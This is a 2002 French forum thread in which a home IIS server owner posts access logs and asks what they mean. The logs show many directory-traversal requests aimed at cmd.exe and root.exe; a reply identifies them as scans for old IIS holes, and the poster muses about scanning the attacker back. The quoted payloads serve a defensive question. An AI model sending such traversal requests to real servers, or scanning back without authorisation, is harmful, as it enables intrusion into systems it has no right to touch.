Tentative d'intrusion ?

Tentative d'intrusion ? - Windows & Software

Marsh Posté le 27-10-2002 à 18:45:39    

Salut,
 
Lorsque je suis chez moi (connexion ADSL) les logs de mon serveur web (IIS) se remplissent à une vitesse monstrueuse de ces lignes (je dois avoir plusieurs Mo de logs comme ca) :  

Citation :

#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2002-10-25 22:05:12
#Fields: time c-ip cs-username cs-method cs-uri-stem cs-uri-query sc-status sc-bytes cs-host  
22:14:37 81.48.102.106 - GET /scripts/root.exe /c+dir 404 963 www
22:14:37 81.48.102.106 - GET /MSADC/root.exe /c+dir 404 963 www
22:14:41 81.48.102.106 - GET /c/winnt/system32/cmd.exe /c+dir 404 963 www
22:14:41 81.48.102.106 - GET /d/winnt/system32/cmd.exe /c+dir 404 963 www
22:14:42 81.48.102.106 - GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 963 www
22:14:42 81.48.102.106 - GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 963 www
22:14:44 81.48.102.106 - GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 963 www
22:14:44 81.48.102.106 - GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 404 963 www
22:14:44 81.48.102.106 - GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 404 963 www
22:14:49 81.48.102.106 - GET /scripts/winnt/system32/cmd.exe /c+dir 404 963 www
22:14:49 81.48.102.106 - GET /winnt/system32/cmd.exe /c+dir 404 963 www
22:14:50 81.48.102.106 - GET /winnt/system32/cmd.exe /c+dir 404 963 www


 
Est ce que vous pouvez m'expliquer a quoi tt cela correspond. J'ai bien une petite idée, mais c'est pour etre sur.
Merci beaucoup

Reply

Marsh Posté le 27-10-2002 à 18:45:39   

Reply

Marsh Posté le 27-10-2002 à 18:47:30    

C'est une tentative de détection des différents trous de sécurité historiques de IIS...
 
Si tu tiens bien à jour ta version, ça devrait rouler ... mais bon, fait gaffe quand même :)
 
... où installe Apache 1.3.26 .... ok je ferme la porte en sortant :D

Reply

Marsh Posté le 27-10-2002 à 18:51:56    

origin a écrit a écrit :

C'est une tentative de détection des différents trous de sécurité historiques de IIS...
 
Si tu tiens bien à jour ta version, ça devrait rouler ... mais bon, fait gaffe quand même :)
 
... où installe Apache 1.3.26 .... ok je ferme la porte en sortant :D
 




 
J'ai tous les derniers patchs de sécurité de Crosoft, et en plus mon repertoire d'install est pas le repertoire windows ou winNT.  
Sinon apache, j'ai essayé mais j'aime bien IIS (surtout que tu ajoute un rep virtuel en 2 clics). Et en plus mon site est en grande partie en ASP :D  
 
 
Mais, sinon, tu crois que moi aussi je peux jouer avec eux ? Je peux faire un scan de leur ordi ? ou je les balance en abuse@wanadoo ?

Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed